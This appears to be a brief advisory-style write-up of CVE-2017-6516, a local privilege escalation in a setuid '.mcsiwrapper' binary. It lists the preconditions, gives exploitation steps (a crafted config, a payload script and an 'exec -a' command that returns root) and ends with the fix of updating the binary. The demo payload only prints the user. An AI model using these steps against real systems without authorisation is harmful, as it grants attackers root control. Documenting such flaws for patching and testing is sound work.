CVE-2017-6516 is a privilege escalation vulnerability that targets the .mcsiwrapper
binary from MagniCorp SysInfo under version 10-H64. When this binary has the SUID bit set and is outdated, a user may execute arbitrary code as the owner of the binary - which is often root
.
- The binary
.mcsiwrapper
must be setuid:
$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
- The binary
.mcsiwrapper
must be under version 10-H64:
$ .mcsiwrapper --version
<Version under 10-H64>
Create a file config
with the following contents:
ExecPath=<Path to a writeable directory>
Create a payload executable file in the ExecPath
directory, for instance:
#!/bin/sh
whoami
And make it executable:
$ chmod +x payload
Run the command:
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root
Update .mcsiwrapper
to at least 10-H64.